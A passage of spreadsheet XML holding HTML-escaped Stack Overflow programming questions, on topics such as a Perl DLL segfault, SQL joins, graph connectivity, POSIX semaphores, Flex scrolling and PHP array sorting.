&lt;p&gt;DLL : Code = 0x10107458 Error = 0x10046b50 str = 0x10107460&lt;/p&gt;
&lt;p&gt;Perl : Code = 0x101311b8 Error = 0x101312a8 str = 0x10131230&lt;/p&gt;
&lt;p&gt;Any idea why the DLL is getting the wrong addresses?&lt;/p&gt;
&lt;p&gt;****More information&lt;/p&gt;
&lt;p&gt;After much debugging, I found out that this is happening when returning from the DLL function. I added printf("done\n"); as the very last line of this DLL function, and this does output, then the program segfaults. I guess its happening in Win32::API? Has anyone experienced this?&lt;/p&gt;
&lt;p&gt;Also, I am able to access the initial variables of all the three variables from the DLL. So the pointer is passed correctly, but for some reason it causes a segfault when returning from the DLL. Maybe it's segfaulting when trying to copy the new data into the Perl variable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL join: where clause vs. on clause</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After reading it, this is &lt;em&gt;not&lt;/em&gt; a duplicate of &lt;a href="http://stackoverflow.com/questions/44917/explicit-vs-implicit-sql-joins"&gt;Explicit vs Implicit SQL Joins&lt;/a&gt;.
The answer may be related (or even the same) but the &lt;strong&gt;question&lt;/strong&gt; is different.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;What is the difference and what should go in each?&lt;/p&gt;
&lt;p&gt;If I understand the theory correctly, the query optimizer should be able to use both interchangeably.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Javascript, what is the difference between indexOf() and search()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Being fairly new to Javascript, I'm unable to discern when to use each of these.&lt;/p&gt;
&lt;p&gt;Can anyone help clarify this for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine if two nodes are connected?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm concerned that this might be working on an NP-Complete problem. I'm hoping someone can give me an answer as to whether it is or not. And I'm looking for more of an answer than just yes or no. I'd like to know why. If you can say,"This is basically this problem 'x' which is/is not NP-Complete. (wikipedia link)"&lt;/p&gt;
&lt;p&gt;(No this is not homework)&lt;/p&gt;
&lt;p&gt;Is there a way to determine if two points are connected on an arbitrary non-directed graph. e.g., the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Well
  |
  |
  A
  |
  +--B--+--C--+--D--+
  |     |     |     |
  |     |     |     |
  E     F     G     H
  |     |     |     |
  |     |     |     |
  +--J--+--K--+--L--+
                    |
                    |
                    M
                    |
                    |
                  House
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Points A though M (no 'I') are control points (like a valve in a natural gas pipe) that can be either open or closed. The '+'s are nodes (like pipe T's), and I guess the Well and the House are also nodes as well.&lt;/p&gt;
&lt;p&gt;I'd like to know if I shut an arbitrary control point (e.g., C) whether the Well and House are still connected (other control points may also be closed). E.g., if B, K and D are closed, we still have a path through A-E-J-F-C-G-L-M, and closing C will disconnect the Well and the House. Of course; if just D was closed, closing only C does not disconnect the House.&lt;/p&gt;
&lt;p&gt;Another way of putting this, is C a bridge/cut edge/isthmus?&lt;/p&gt;
&lt;p&gt;I could treat each control point as a weight on the graph (either 0 for open or 1 for closed); and then find the shortest path between Well and House (a result &gt;= 1 would indicate that they were disconnected. There's various ways I can short circuit the algorithm for finding the shortest path too (e.g., discard a path once it reaches 1, stop searching once we have ANY path that connects the Well and the House, etc.). And of course, I can also put in some artificial limit on how many hops to check before giving up.&lt;/p&gt;
&lt;p&gt;Someone must have classified this kind of problem before, I'm just missing the name.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding a SOAP header to a SOAPpy request</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to do this? I need to add a header of the form:&lt;/p&gt;
&lt;p&gt;
    value1
    value2
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transitions and setting up Layers/Scenes in cocos2d iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to setup a transition between two levels(after one level is complete, use one of cocos2d's slick transition to transition into the next level).  In my GameLayer implementation, I have methods setup to do things like [self buildLevel: 3] to build the playfield.  What do I need to do to instantiate a new GameLayer or Layer node or GameScene or Scene node to be able to do things such as:&lt;/p&gt;
&lt;p&gt;GameLayer * nextLevelLayer;&lt;/p&gt;
&lt;p&gt;[nextLevelLayer buildLevel: 4];&lt;/p&gt;
&lt;p&gt;... do a transition between the level 3 and level 4&lt;/p&gt;
&lt;p&gt;Perhaps I've laid out my code in a complete misunderstanding of Objective C.  I am assuming you can't setup a new GameLayer in the init code, as it will hang, continuously created new nodes.  I probably have too much playfield setup code in my init code for the GameLayer, how do you guys usually handle it?  Do you set a flag before scheduling the selector for the game's main loop, then if the flag is set, setup the level in the game's main loop, or is there a better way to go about it?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preventing automatic change of default-directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As per &lt;a href="http://www.gnu.org/software/emacs/manual/html_node/emacs/File-Names.html"&gt;the Emacs docs&lt;/a&gt;, every time you open a file, Emacs changes &lt;code&gt;default-directory&lt;/code&gt; to the directory containing that file.  &lt;/p&gt;
&lt;p&gt;Then, if the cursor is in that buffer and you (for example) start SLIME, it uses &lt;code&gt;default-directory&lt;/code&gt; as the current working directory for SLIME.  If you try to open a new file, it opens the file with &lt;code&gt;default-directory&lt;/code&gt; as your starting point.&lt;/p&gt;
&lt;p&gt;I want to be able to &lt;code&gt;M-x cd&lt;/code&gt; or otherwise &lt;code&gt;cd&lt;/code&gt; to a directory, and then never have Emacs change my current working directory to anything but that directory until I tell it otherwise.  I want this to be global across all buffers, so that any time I'm doing something involving the current working directory, I know what it's set to regardless of where my cursor is at the moment.  Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create a colored bubble/circle programmatically in ObjectiveC and Cocoa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone guide me in the correct way to build a colored bubble/circle programmatically?&lt;/p&gt;
&lt;p&gt;I can't use images as I need it to be able to be any color depending on user interaction.&lt;/p&gt;
&lt;p&gt;My thought was maybe to make a white circle image and then overlay a color on top of it.
However I am not sure if this would work, or how to really go about it.&lt;/p&gt;
&lt;p&gt;If someone could point me the right direction I would appreciate it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Number of arrangements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose we have &lt;em&gt;n&lt;/em&gt; elements, &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;1&lt;/sub&gt;, &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;2&lt;/sub&gt;, ..., &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;n&lt;/sub&gt;, arranged in a circle. That is, &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;2&lt;/sub&gt; is between &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;1&lt;/sub&gt; and &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;3&lt;/sub&gt;, &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;3&lt;/sub&gt; is between &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;2&lt;/sub&gt; and &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;4&lt;/sub&gt;, &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;&lt;em&gt;n&lt;/em&gt;&lt;/sub&gt; is between &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;&lt;em&gt;n&lt;/em&gt;-1&lt;/sub&gt; and &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;1&lt;/sub&gt;, and so forth.&lt;/p&gt;
&lt;p&gt;Each element can take the value of either 1 or 0. Two arrangements are different if there are corresponding &lt;em&gt;a&lt;/em&gt;&lt;sub&gt;&lt;em&gt;i&lt;/em&gt;&lt;/sub&gt;'s whose values differ. For instance, when &lt;em&gt;n&lt;/em&gt;=3, (1, 0, 0) and (0, 1, 0) are different arrangements, even though they may be isomorphic under rotation or reflection.&lt;/p&gt;
&lt;p&gt;Because there are &lt;em&gt;n&lt;/em&gt; elements, each of which can take two values, the total number of arrangements is 2&lt;sup&gt;&lt;em&gt;n&lt;/em&gt;&lt;/sup&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here is the question:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;How many arrangements are possible, such that no two adjacent elements both have the value 1? If it helps, only consider cases where &lt;em&gt;n&lt;/em&gt;&gt;3. &lt;/p&gt;
&lt;p&gt;I ask here for several reasons:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;This arose while I was solving a programming problem&lt;/li&gt;
&lt;li&gt;It sounds like the problem may benefit from Boolean logic/bit arithmetic&lt;/li&gt;
&lt;li&gt;Maybe there is no closed solution.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How do I keep an NSPathControl updated with the path of the selected cell in an NSBrowser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to keep an NSPathControl updated with the currently selected path in an NSBrowser, but I'm having trouble figuring out a way of getting notifications when the path has changed from the NSBrowser. The ideal way to do this would just to be to observe the path key path in the NSBrowser, but that gives a KVO can only observe set&lt;code&gt;&amp;lt;key&amp;gt;&lt;/code&gt; methods which return void message and no updates (setPath returns a bool success value).&lt;/p&gt;
&lt;p&gt;I also tried observing the selectedCell key path, but I'm not getting notifications when the selection there is changed.&lt;/p&gt;
&lt;p&gt;Is there some other really obvious way to do this that I'm missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using an epsilon value to determine if a ball in a game is not moving?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have balls bouncing around and each time they collide their speed vector is reduced by the Coefficient of Restitution.&lt;/p&gt;
&lt;p&gt;Right now my balls CoR for my balls is .80 . So after many bounces my balls have "stopped" rolling because their speed has becoming some ridiculously small number.  &lt;/p&gt;
&lt;p&gt;In what stage is it appropriate to check if a speed value is small enough to simply call it zero (so I don't have the crazy jittering of the balls reacting to their micro-velocities).  I've read on some forums before that people will sometimes use an epsilon constant, some small number and check against that.&lt;/p&gt;
&lt;p&gt;Should I define an epsilon constant and do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if Math.abs(velocity.x) &amp;lt; epsilon then velocity.x = 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Each time I update the balls velocity and position?  Is this what is generally done?  Would it be reasonable to place that in my Vector classes setters for x and y?  Or should I do it outside of my vector class when I'm calculating the velocities. &lt;/p&gt;
&lt;p&gt;Also, what would be a reasonable epsilon value if I was using floats for my speed vector?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adobe Flex/AIR: Scrolling a sub-component, not the whole window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an application with Adobe Flex and AIR, and I've been banging my head against the wall trying to figure out how to solve a scrolling issue.&lt;/p&gt;
&lt;p&gt;The basic structure of my main application window (simplified greatly) is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;mx:WindowedApplication xmlns:mx="http://www.adobe.com/2006/mxml"
   paddingTop="0" paddingRight="0" paddingBottom="0" paddingLeft="0"
   width="800" height="600" layout="vertical" verticalAlign="top" 
&amp;gt;
   &amp;lt;mx:VBox id="MainContainer" width="100%" height="100%"&amp;gt;
      &amp;lt;mx:Panel id="Toolbars" width="100%" height="25" /&amp;gt;
      &amp;lt;mx:HDividedBox width="100%" height="100%" &amp;gt;
         &amp;lt;mx:Panel id="Navigation" minWidth="200" height="100%" /&amp;gt;
         &amp;lt;mx:VBox id="MainContent" width="100%"&amp;gt;
            &amp;lt;mx:Panel width="100%" height="200" /&amp;gt;
            &amp;lt;mx:Panel width="100%" height="200" /&amp;gt;
            &amp;lt;mx:Panel width="100%" height="200" /&amp;gt;
            &amp;lt;mx:Panel width="100%" height="200" /&amp;gt;
            &amp;lt;mx:Panel width="100%" height="200" /&amp;gt;
         &amp;lt;/mx:VBox&amp;gt;
         &amp;lt;mx:Panel id="HelpContent" minWidth="200" height="100%" /&amp;gt;
      &amp;lt;/mx:HDividedBox&amp;gt;
      &amp;lt;mx:Panel id="FooterContent" width="100%" height="25" /&amp;gt;
   &amp;lt;/mx:VBox&amp;gt;
&amp;lt;/mx:WindowedApplication&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The trouble is that the "MainContent" box might contain a huge list of subcomponents, and the presence of that long list causes a vertical scrollbar to appear at the highest level of the GUI, surrounding the "MainContainer" vbox.&lt;/p&gt;
&lt;p&gt;It looks really silly, having scrollbars around the entire application window.&lt;/p&gt;
&lt;p&gt;What I'm looking for instead is a solution where the scrollbar is only applied to the "MainContent" vbox (as well as the Navigation and HelpContent panels, if their content stretches past the window bounds).&lt;/p&gt;
&lt;p&gt;I found a &lt;a href="http://stackoverflow.com/questions/245292/best-way-to-size-containers-in-flex-to-obey-only-parent-containers-explicit-dim"&gt;related question&lt;/a&gt; on StackOverflow, where the problem's solution was to use "autoLayout" and "verticalScrollPolicy" attributes on parent containers.&lt;/p&gt;
&lt;p&gt;So I tried adding autoLayout="false" and verticalScrollPolicy="off" attributes to all of the parent containers, as well as verticalScrollPolicy="on" to the "MainContent" vbox. But the end-result of that experiment was that the content was simply clipped from the main container (and a useless scrollbar with no thumb was added to the MainContent vbox).&lt;/p&gt;
&lt;p&gt;Anyone know how to solve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Displaying foreign key relationships in Oracle 9i</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a command in oracle 9i that displays the foreign keys of a table and also the table that those foreign keys reference?&lt;/p&gt;
&lt;p&gt;I was searching, did not find anything but i found an equivalent command that works with MySql which is SHOW CREATE TABLE &lt;/p&gt;
&lt;p&gt;Is there an equivalent command for this within oracle's SQL?&lt;/p&gt;
&lt;p&gt;I appreciate your response, however I thought there was a really short way of doing this like MySql. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use "references" for multiple items of same type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm teaching myself Ruby on Rails, with a PHP background. I've written a sloppy, proof-of-concept PHP application called "&lt;a href="http://rezich.com/storybored" rel="nofollow"&gt;2NDP.&lt;/a&gt;" I want to re-create this in Ruby on Rails (but more basic, more clean, and with a better interface), so I can learn some of the basics.&lt;/p&gt;
&lt;p&gt;2NDP is a website where you can basically write your own "Choose-Your-Own-Adventure" books, but collaboratively, with other people. The way I made this work with PHP/MySQL is, I had a table of stories and a table of pages. The pages would belong to stories (obviously), but each page would have references to up to four other pages by having four separate columns, one for each possible page ID that could be referenced.&lt;/p&gt;
&lt;p&gt;So right now in my RoR application, I have "stories" that have "pages" that are associated with them. I need a way to get the pages to reference each other, but the possibility of more than one reference per page (one page may reference up to four other pages).&lt;/p&gt;
&lt;p&gt;I really like the "references" thing that RoR has, but is there any way to gracefully implement this sort of system? Keep in mind that my only RoR experience is walking through four tutorials, and I'm trying to re-apply what I've learned with a "real-life application."&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should Class Helpers be used in developing new code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Delphi 8 introduced Class Helpers for the purposes of mapping the VCL/RTL to the .NET object hierarchy.  They allow injecting methods into an existing class without overriding the the class or modifying the original.  Later versions of Delphi found class helpers improved and they were ported to Win32.&lt;/p&gt;
&lt;p&gt;In the help it says "they should not be viewed as a design tool to be used when developing new code."&lt;/p&gt;
&lt;p&gt;Class Helpers violate traditional OOP, but I don't think that makes them a bad thing.  Is this warning warranted?  &lt;/p&gt;
&lt;p&gt;Should class helpers be used when developing new code?  &lt;/p&gt;
&lt;p&gt;Do you use them when developing new code?  &lt;/p&gt;
&lt;p&gt;Why or why not?&lt;/p&gt;
&lt;p&gt;Per &lt;a href="http://stackoverflow.com/questions/354940/should-class-helpers-be-used-in-developing-new-code#355086"&gt;Malcolm's comments&lt;/a&gt;: New code means daily application development, where you have some 3rd party libraries, some existing code, and then code you are writing.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Formatting double as string in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Double which could have a value from around 0.000001 to 1,000,000,000.000&lt;/p&gt;
&lt;p&gt;I wish to format this number as a string but conditionally depending on its size. So if it's very small I want to format it with something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String.Format("{0:.000000000}", number);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;if it's not that small, say 0.001 then I want to use something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String.Format("{0:.00000}", number);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and if it's over, say 1,000 then format it as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String.Format("{0:.0}", number);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a clever way to construct this format string based on the size of the value I'm going to format?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to avoid a wakeup-waiting race using only POSIX semaphores? Is it benign?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to use POSIX semaphores to manage atomic get and put from a file representing a queue.  I want the flexibility of having something named in the filesystem, so that completely unrelated processes can share a queue.  I think this plan rules out pthreads.  The named posix semaphores are great for putting something in the filesystem that any process can see, but I can't find the standard CondWait primitive:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;... decide we have to wait ....
CondWait(sem, cond);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When CondWait is called by a process it atomically posts to sem and waits on cond.  When some other process posts to cond, the waiting process wakes up only if it can atomically decrement sem as well.  The alternative of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;... decide we have to wait ....
sem_post(sem);
sem_wait(cond);
sem_wait(sem);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is subject to a race condition in which some other process signals cond just before this process waits on it.&lt;/p&gt;
&lt;p&gt;I hardly ever do any concurrent programming, so I thought I would ask SO: if I use a standard POSIX counting semaphore for the condition variable, is it possible that this race is benign?&lt;/p&gt;
&lt;p&gt;Just in case anybody wants the larger context, I am building get and put operations for an atomic queue that can be called from shell scripts.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# vs Java generics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard that the Java implementation of Generics is not as good as the C# implementation. In that the syntax looks similar, what is it that is substandard about the Java implementation, or is it a religious point of view?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Defining const values in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C project where all code is organized in &lt;code&gt;*.c&lt;/code&gt;/&lt;code&gt;*.h&lt;/code&gt; file pairs, and I need to define a constant value in one file, which will be however also be used in other files. How should I declare and define this value?&lt;/p&gt;
&lt;p&gt;Should it be as &lt;code&gt;static const ...&lt;/code&gt; in the &lt;code&gt;*.h&lt;/code&gt; file? As &lt;code&gt;extern const ...&lt;/code&gt; in the &lt;code&gt;*.h&lt;/code&gt; file and defined in the &lt;code&gt;*.c&lt;/code&gt; file? In what way does it matter if the value is not a primitive datatype (&lt;code&gt;int&lt;/code&gt;, &lt;code&gt;double&lt;/code&gt;, etc), but a &lt;code&gt;char *&lt;/code&gt; or a &lt;code&gt;struct&lt;/code&gt;? (Though in my case it is a &lt;code&gt;double&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;Defining stuff inside &lt;code&gt;*.h&lt;/code&gt; files doesn't seem like a good idea generally; one should declare things in the &lt;code&gt;*.h&lt;/code&gt; file, but define them in the &lt;code&gt;*.c&lt;/code&gt; file. However, the &lt;code&gt;extern const ...&lt;/code&gt; approach seems inefficient, as the compiler wouldn't be able to inline the value, it instead having to be accessed via its address all the time.&lt;/p&gt;
&lt;p&gt;I guess the essence of this question is: Should one define &lt;code&gt;static const ...&lt;/code&gt; values in &lt;code&gt;*.h&lt;/code&gt; files in C, in order to use them in more that one place?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Downloading the gzip file and Uncompressing to retrieve Content using IPHONE SDK on iphone and ipod touch devices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had the following questions related to downloading the file from the server.&lt;/p&gt;
&lt;p&gt;a) Is it possible to download directly the GZIP (Compressed)file to the iphone device using IPHONE SDK.
b) If the compressed file can be downloaded , then how to uncompress it(using ZLIB or else...).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert VB.NET --&gt; C# Projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good application that could be used to convert VB.NET projects to C#, without having to do too much manual work?&lt;/p&gt;
&lt;p&gt;We've used Reflector to do small libraries manually, but some of the larger projects will be too slow and complex to do this manually.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set WPF's Grid.RowDefinitions via Style</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a couple of &lt;code&gt;Grid&lt;/code&gt;s to format multiple &lt;code&gt;GridViewColumn.CellTemplate&lt;/code&gt;s:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ListView SharedSizeScope="true"&amp;gt;
  &amp;lt;ListView.View&amp;gt;
    &amp;lt;GridView&amp;gt;
      &amp;lt;GridViewColumn&amp;gt;
        &amp;lt;GridViewColumn.CellTemplate&amp;gt;
          &amp;lt;DataTemplate&amp;gt;
            &amp;lt;Grid&amp;gt;
              &amp;lt;Grid.RowDefinitions&amp;gt;
                &amp;lt;RowDefinition SharedSizeGroup="foo" /&amp;gt;
                &amp;lt;!-- ... --&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried to extract the &lt;code&gt;RowDefinition&lt;/code&gt;s (which are the same for all columns) into a &lt;code&gt;Style&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Style TargetType="{x:Type Grid}"&amp;gt;
  &amp;lt;Setter Property="RowDefinitions"&amp;gt;
    &amp;lt;Setter.Value&amp;gt;
      &amp;lt;RowDefinition SharedSizeGroup="foo" /&amp;gt;
      &amp;lt;!-- ... --&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the compiler complains:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Error: The Property Setter
  'RowDefinitions' cannot be set because
  it does not have an accessible set
  accessor.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Which is kind of obvious, but not very helpful.&lt;/p&gt;
&lt;p&gt;How could I avoid specifying the row definitions multiple times (see also &lt;a href="http://c2.com/cgi/wiki?DontRepeatYourself"&gt;Don't Repeat Yourself&lt;/a&gt;) short of coding up a custom derivation of the &lt;code&gt;Grid&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the typical use cases of Genetic Programming?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Today I read &lt;a href="http://rogeralsing.com/2008/12/07/genetic-programming-evolution-of-mona-lisa/" rel="nofollow"&gt;this blog entry by Roger Alsing&lt;/a&gt; about how to paint a replica of the &lt;a href="http://en.wikipedia.org/wiki/Mona_Lisa" rel="nofollow"&gt;Mona Lisa&lt;/a&gt; using only 50 semi transparent polygons.&lt;/p&gt;
&lt;p&gt;I'm fascinated with &lt;a href="http://rogeralsing.files.wordpress.com/2008/12/evolutionofmonalisa1.gif" rel="nofollow"&gt;the results&lt;/a&gt; for that particular case, so I was wondering (and this is my question): &lt;strong&gt;how does genetic programming work&lt;/strong&gt; and what other &lt;strong&gt;problems could be solved&lt;/strong&gt; by genetic programming?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Event log messages get overrriden by another event log</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I create event logs for asp.net projects error logging. I do it by adding a key in regedit, and then a sub-key.&lt;br /&gt;
Sometimes, I create a new key and sub-key, and instead of getting a new, empty event log, I see in the event viewer that it's showing me the logs from a different project. I'm not able to find a pattern as to when this happens.&lt;br /&gt;
Has anyone encountered such a problem? Am I doing something wrong? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails: Blocking an user using routes.rb</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a special url which I would want only few people to have access to. I have a list of super users stored as an array in the app.yml. How can I use this array in :requirements section of a specific route in the routes.rb file to allow only those super users access to this route? Thanks a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sorting an Array of Objects in PHP In a Specific Order</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two arrays in PHP. The first array ($author_array) is comprised of user_ids in a particular order, like so: (8, 1, 6)&lt;/p&gt;
&lt;p&gt;The second array ($user_results) is comprised of an array of objects like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Array
(
    [0] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 1
            [user_login] =&amp;gt; user1
        )
    [1] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 6
            [user_login] =&amp;gt; user6
        )
    [2] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 8
            [user_login] =&amp;gt; user8
        )
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to "sort" the second array so it's in this order, which matches the order of the values in the first array of (8, 1, 6). So it'd look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Array
(
    [0] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 8
            [user_login] =&amp;gt; user8
        )
    [1] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 1
            [user_login] =&amp;gt; user1
        )
    [2] =&amp;gt; stdClass Object
        (
            [ID] =&amp;gt; 6
            [user_login] =&amp;gt; user6
        )
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm weak on data structures. How could I do this? :-)&lt;/p&gt;
&lt;p&gt;Thanks in advance for your help!&lt;/p&gt;
&lt;p&gt;-Bob&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to sort the data in alphanumeric values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have these values: &lt;code&gt;d1, d45, d79, d33, d100&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I want to sort these variables in ascending order from my table.&lt;/p&gt;
&lt;p&gt;What is the query to get the output as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;d1
d33
d45
d79
d100
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Virtual Directory in ASP.NET project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In our web application we have a directory which resides outside of the project. On IIS that's no problem to do, but can I do that also in my project in Visual Studio?  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; My project is running on File System, and not on Local IIS&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Codenamed Products and Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any practices regarding using codenames of products in Visual Studio projects and solutions? In that typically, namespaces, assembly names, binary outputs, et al need to be renamed once a product name is chosen: is there any way to deal with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ HTML template framework, templatizing library, HTML generator library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for template/generator libraries for C++ that are similar to eg. Ruby's Erb, Haml, PHP's Smarty, etc.&lt;/p&gt;
&lt;p&gt;It would be great if I it would sport some basic features like loops, if/else, int conversion to strings, etc.&lt;/p&gt;
&lt;p&gt;Parameter passing to template rendering engine is also important if I could pass all of them in a hash map instead of calling some function for each of parameters.&lt;/p&gt;
&lt;p&gt;Do you have any recommendations?&lt;/p&gt;
&lt;p&gt;I can see also the possibility of embedding languages like Lua, however I haven't found a templatizing library for that either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is returning early from a function more elegant than an if statement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Myself and a colleague have a dispute about which of the following is more elegant. I won't say who's who, so it is impartial. Which is more elegant?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function set hitZone(target:DisplayObject):void
        {
            if(_hitZone != target)
            {
                _hitZone.removeEventListener(MouseEvent.ROLL_OVER, onBtOver);
                _hitZone.removeEventListener(MouseEvent.ROLL_OUT, onBtOut);
                _hitZone.removeEventListener(MouseEvent.MOUSE_DOWN, onBtDown);
                _hitZone = target;
                _hitZone.addEventListener(MouseEvent.ROLL_OVER, onBtOver, false, 0, true);
                _hitZone.addEventListener(MouseEvent.ROLL_OUT, onBtOut, false, 0, true);
                _hitZone.addEventListener(MouseEvent.MOUSE_DOWN, onBtDown, false, 0, true);
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...or...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function set hitZone(target:DisplayObject):void
        {
            if(_hitZone == target)return;
            _hitZone.removeEventListener(MouseEvent.ROLL_OVER, onBtOver);
            _hitZone.removeEventListener(MouseEvent.ROLL_OUT, onBtOut);
            _hitZone.removeEventListener(MouseEvent.MOUSE_DOWN, onBtDown);
            _hitZone = target;
            _hitZone.addEventListener(MouseEvent.ROLL_OVER, onBtOver, false, 0, true);
            _hitZone.addEventListener(MouseEvent.ROLL_OUT, onBtOut, false, 0, true);
            _hitZone.addEventListener(MouseEvent.MOUSE_DOWN, onBtDown, false, 0, true);
        }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Symbian C++ STOMP library</t>
  </si>
  <si>
